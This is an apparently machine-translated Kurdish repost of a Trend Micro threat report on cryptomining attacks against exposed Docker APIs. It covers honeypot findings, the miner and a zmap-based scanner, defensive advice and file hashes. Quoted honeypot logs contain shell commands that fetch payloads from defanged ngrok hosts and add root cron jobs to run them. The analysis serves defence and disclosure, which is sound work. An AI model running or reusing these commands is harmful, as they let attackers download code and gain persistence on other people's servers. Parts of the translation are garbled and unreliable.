Me daneyên berhevkirî bi karanîna konteynerên honeypot, yên ku me afirandin ji bo şopandina xetereyan analîz kirin. Û me çalakiyek girîng ji madenkarên krîpto-pereyê nedilxwaz an bêdestûr dît ku wekî konteynerên nerast bi karanîna wêneyek ku ji civatê hatî weşandin li ser Docker Hub bikar tînin. Wêne wekî beşek karûbarek tê bikar anîn ku mîneralên xedar ên krîptoyê peyda dike.
Wekî din, bernameyên ji bo xebata bi toran re têne saz kirin da ku têkevin konteynir û serîlêdanên cîranên vekirî.
Em hingivên xwe wekî xwe dihêlin, ango bi mîhengên xwerû, bêyî ti tedbîrên ewlehiyê an sazkirina paşê ya nermalava zêde. Ji kerema xwe not bikin ku Docker ji bo sazkirina destpêkê pêşniyarên xwe hene da ku ji xeletî û qelsiyên hêsan dûr bikevin. Lê hingivên ku têne bikar anîn konteynir in, ku ji bo tespîtkirina êrişên ku li ser platforma konteynerê têne armanc kirin, ne sepanên di hundurê konteyneran de hatine çêkirin.
Çalakiya xerab a ku hatiye tespîtkirin jî girîng e ji ber ku ew qelsiyan hewce nake û ji guhertoya Docker jî serbixwe ye. Dîtina wêneyek konteynerê ya ku bi xeletî hatî mîheng kirin, û ji ber vê yekê vekirî ye, hemî tiştê ku êrîşkar hewce dike ku gelek serverên vekirî veşêre.
Docker API-ya negirtî destûrê dide bikarhêner ku rêzek berfireh pêk bîne , di nav de wergirtina navnîşek konteynerên xebitandinê, wergirtina têketin ji konteynirek taybetî, dest pê kirin, rawestandin (tevî bi zorê) û tewra çêkirina konteynirek nû ji wêneyek taybetî bi mîhengên diyarkirî re.
Li milê çepê rêbaza radestkirina malware ye. Li milê rastê hawîrdora êrîşkar heye, ku destûrê dide kişandina wêneyan ji dûr ve.
Belavkirina li gorî welat 3762 API-yên vekirî yên Docker. Li ser bingeha lêgerîna Shodan a 12.02.2019/XNUMX/XNUMX
Vebijarkên zincîre û bargiraniyê êrîş bikin
Çalakiya xerab ne tenê bi alîkariya honeypots hate dîtin. Daneyên ji Shodan destnîşan dikin ku ji ber ku me li konteynirek xelet vesazkirî ku wekî pirek tê bikar anîn da ku nermalava kanankirina pereyê krîpto Monero-yê bikar bîne, hejmara API-yên Docker ên eşkerekirî zêde bûye (grafika duyemîn binêre). Di Cotmeha sala borî de (2018, daneyên heyî approx. wergêr) tenê 856 API-yên vekirî hebûn.
Vekolînek têketinên honeypot destnîşan kir ku karanîna wêneya konteynerê jî bi karanîna ve girêdayî ye , amûrek ji bo sazkirina girêdanên ewledar an şandina seyrûseferê ji xalên gihîştî yên gelemperî berbi navnîşan an çavkaniyên diyarkirî (mînakî localhost). Ev dihêle ku êrîşkar bi dînamîk URLan biafirînin dema ku bargiraniyê didin serverek vekirî. Li jêr mînakên kodê ji têketin hene ku destdirêjiya karûbarê ngrok nîşan didin:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Wekî ku hûn dikarin bibînin, pelên barkirî ji URLên ku bi berdewamî diguherin têne dakêşandin. Van URLan xwedan tarîxek qedandinê ya kurt in, ji ber vê yekê barkêşan piştî roja qedandinê nayên dakêşandin.
Du vebijarkên bargiraniyê hene. Ya yekem ji bo Linux-ê mînerek ELF ya berhevkirî ye (wekî Coinminer.SH.MALXMR.ATNO tê pênase kirin) ku bi hewza madenê ve girêdayî ye. Ya duyemîn skrîptek e (TrojanSpy.SH.ZNETMAP.A) ku ji bo bidestxistina hin amûrên torê yên ku ji bo şopandina rêzikên torê têne bikar anîn û dûv re li armancên nû geriyane hatî çêkirin.
Skrîpta dropper du guhêrbar destnîşan dike, ku dûv re têne bikar anîn da ku mînera krîptoyê bi kar bînin. Guherbara HOST URL-ya ku pelên xirab lê ne dihewîne, û guhêrbar RIP navê pelê ye (bi rastî, hash) ya mînera ku tê bicîh kirin. Guherbara HOST her carê ku guhêrbar hash diguhezîne. Skrîpta di heman demê de hewl dide ku kontrol bike ku kanên din ên krîptoyê li ser servera êrîşkirî naxebitin.
Nimûneyên guhêrbarên HOST û RIP, û her weha pişkek kodek ku tê bikar anîn da ku kontrol bikin ka mînerên din nayên xebitandin
Berî destpêkirina miner, navê wê wekî nginx tê guheztin. Guhertoyên din ên vê skrîptê navê miner bi karûbarên din ên rewa yên ku dibe ku di hawîrdorên Linux de hebin veguhezînin. Ev bi gelemperî bes e ku meriv kontrolên li hember navnîşa pêvajoyên xebitandinê derbas bike.
Skrîpta lêgerînê jî taybetmendiyên xwe hene. Ew bi heman karûbarê URL-ê re dixebite ku amûrên pêwîst bicîh bike. Di nav wan de zmap binary heye, ku ji bo şopandina torê û bidestxistina navnîşek portên vekirî tê bikar anîn. Skrîpt di heman demê de binaryek din jî bar dike ku tê bikar anîn da ku bi karûbarên hatine dîtin re têkilî daynin û pankartan ji wan werbigirin da ku agahdariya zêde li ser karûbarê dîtî diyar bikin (mînak, guhertoya wê).
Nivîsar di heman demê de hin rêzeçiyayên torê yên ji bo şopandinê jî ji berê ve diyar dike, lê ev bi guhertoya skrîptê ve girêdayî ye. Ew di heman demê de portên mebest ji karûbaran-di vê rewşê de, Docker-- berî ku şopandinê bimeşîne destnîşan dike.
Hema ku hedefên gengaz têne dîtin, pankart bixweber ji wan têne rakirin. Nivîsar di heman demê de li gorî karûbar, serîlêdan, pêkhate an platformên berjewendiyê hedefan fîlter dike: Redis, Jenkins, Drupal, MODX, , Docker 1.16 muwekîlê û Apache CouchDB. Ger servera skankirî bi yek ji wan re têkildar be, ew di pelek nivîsê de tê hilanîn, ku êrîşkar dikarin paşê ji bo analîz û hakkirina paşê bikar bînin. Van pelên nivîsê bi girêdanên dînamîkî ve li serverên êrîşkaran têne barkirin. Ango ji bo her pelê URLek cihê tê bikar anîn, ku tê vê wateyê ku gihîştina paşîn dijwar e.
Vektora êrîşê wêneyek Docker e, wekî ku di du perçeyên paşîn ên kodê de tê dîtin.
Li jor navê karûbarek rewa tê guheztin, û li jêr jî ev e ku zmap çawa ji bo şopandina torê tê bikar anîn.
Li jor rêzikên torê yên pêşwextkirî hene, li jêr ji bo lêgerîna karûbaran portên taybetî hene, tevî Docker.
Dîmenê nîşan dide ku wêneya alpine-curl zêdetirî 10 mîlyon carî hatiye dakêşandin
Li ser bingeha Alpine Linux û curl, amûrek CLI-çavkaniyek bikêr ji bo veguheztina pelan li ser protokolên cihêreng, hûn dikarin ava bikin. . Wekî ku hûn di wêneya berê de jî dibînin, ev wêne jixwe zêdetirî 10 mîlyon carî hatiye dakêşandin. Dibe ku hejmareke mezin ji dakêşanan were vê wateyê ku vê wêneyê wekî xala têketinê bikar bînin; ev wêne ji şeş meh berê zêdetir hate nûve kirin; bikarhêneran gelek caran wêneyên din ji vê depoyê dakêşandin. Li Docker - komek rêwerzên ku ji bo mîhengkirina konteynerek ji bo xebitandina wê têne bikar anîn. Ger mîhengên xala têketinê ne rast bin (mînak, konteynir ji Înternetê vekirî bimîne), wêne dikare wekî vektorek êrîşê were bikar anîn. Êrîşkar dikarin wê bikar bînin da ku bargiranek peyda bikin heke ew konteynirek xelet hatî mîheng kirin an vekirî bê piştgirî mayî bibînin.
Girîng e ku bala xwe bidinê ku ev wêne (alpine-curl) bixwe ne xeternak e, lê wekî ku hûn li jor jî dibînin, ew dikare ji bo pêkanîna fonksiyonên xirab were bikar anîn. Wêneyên Docker-ê yên wekhev jî dikarin ji bo pêkanîna çalakiyên xirab werin bikar anîn. Me bi Docker re têkilî danî û li ser vê mijarê bi wan re xebitîn.
pêşnîyarên
bermahî ji bo gelek pargîdaniyan, nemaze yên ku bicîh dikin , li ser pêşveçûn û radestkirina bilez. Her tişt ji hêla pêdivîbûna rêzikên lênêrînê û çavdêriyê, hewcedariya çavdêriya nepenîtiya daneyan, û her weha zirara mezin a ji nepejirandina wan girantir dibe. Tevhevkirina otomasyona ewlehiyê di çerxa jiyanê ya pêşkeftinê de ne tenê ji we re dibe alîkar ku hûn qulên ewlehiyê yên ku dibe ku wekî din nehatin kifş kirin bibînin, lê ew di heman demê de ji we re dibe alîkar ku hûn barê xebata nehewce kêm bikin, wek mînak meşandina avakirina nermalava zêde ji bo her lawazbûnek keşifkirî an mîhengê xelet piştî ku serîlêdanek were bicîh kirin.
Bûyera ku di vê gotarê de hatî nîqaş kirin hewcedariya ku ji destpêkê ve ewlehiyê li ber çavan bigire, di nav de pêşniyarên jêrîn ronî dike:
- Ji bo rêvebirên pergalê û pêşdebiran: Her gav mîhengên API-ya xwe kontrol bikin da ku pê ewle bibin ku her tişt hatî mîheng kirin ku tenê daxwazên ji serverek taybetî an tora hundurîn qebûl bike.
- Prensîba kêmtirîn mafan bişopînin: Piştrast bikin ku wêneyên konteynerê hatine îmzekirin û verast kirin, gihîştina pêkhateyên krîtîk (karûbarê destpêkirina konteyneran) sînordar bikin û şîfrekirinê li girêdanên torê zêde bikin.
- Pêketin û mekanîzmayên ewlehiyê çalak bikin, mînakî. û çêkirî .
- Paqijkirina otomatîkî ya dema xebitandinê û wêneyan bikar bînin da ku agahdariya zêde li ser pêvajoyên ku di konteynerê de diqewimin bistînin (mînak, ji bo tespîtkirina xapandinê an lêgerîna qelsiyan). Kontrola serîlêdanê û çavdêriya yekrêziyê dibe alîkar ku guhartinên nenormal ên server, pel û deverên pergalê bişopînin.
Trendmicro ji tîmên DevOps re dibe alîkar ku bi ewlehî ava bikin, zû biqedin, û li her deverê dest pê bikin. Trend Micro Ewlekariya hêzdar, birêkûpêk û otomatîkî li seranserê lûleya DevOps a rêxistinê peyda dike û berevaniyên pir xeternak peyda dike. ji bo parastina barkêşên xebata fîzîkî, virtual û ewr di dema xebitandinê de. Di heman demê de ew ewlehiya konteynerê jî zêde dike и , ku wêneyên konteynera Docker-ê ji bo malware û qelsiyan li her xala xeta pêşkeftinê dişoxilîne da ku pêşî li metirsiyan bigire berî ku ew werin bicîh kirin.
Nîşaneyên lihevhatinê
Haşeyên têkildar:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
li ser Axaftvanên pratîkî destnîşan dikin ka kîjan mîhengan divê pêşî bêne çêkirin da ku îhtîmala kêm bikin an bi tevahî ji rûdana rewşa ku li jor hatî destnîşan kirin dûr bixin. Û di 19-21ê Tebaxê de li ser înternetê întensîv Hûn dikarin van û pirsgirêkên ewlehiyê yên mîna wan bi hevkar û mamosteyên praktîzker re li ser maseya dor biaxivin, ku her kes dikare biaxive û guh bide êş û serkeftinên hevkarên xwedî ezmûn.
Source: www.habr.com